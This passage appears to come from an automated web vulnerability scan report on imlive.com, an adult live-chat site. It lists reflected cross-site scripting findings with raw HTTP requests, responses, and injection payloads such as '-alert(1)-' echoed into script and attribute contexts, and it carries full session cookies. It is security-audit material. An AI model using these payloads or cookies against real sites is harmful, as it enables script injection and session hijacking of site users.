Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:02 GMT
Connection: close
Content-Length: 24983
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.83. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video-for-ipod/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5370e"><a>3222e16e08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:12 GMT
Connection: close
Content-Length: 73010
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.84. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video-for-ipod/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daba9'-alert(1)-'82614b3e5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:19 GMT
Connection: close
Content-Length: 73157
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.85. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11eb'-alert(1)-'f3d704a6f4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:29 GMT
Connection: close
Content-Length: 52326
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.86. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e26eb"><a>443e0c98ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:23 GMT
Connection: close
Content-Length: 52111
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.87. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/gay-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20260"><a>39ff4f914a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:49 GMT
Connection: close
Content-Length: 34182
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1">
...[SNIP]...

2.88. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2072'-alert(1)-'fe8b9fbca10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:59 GMT
Connection: close
Content-Length: 34366
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.89. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/gay/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b640"><a>ffa3e1dc7af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:00 GMT
Connection: close
Content-Length: 195797
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1">
...[SNIP]...

2.90. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4cfa'-alert(1)-'0c9972c192e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
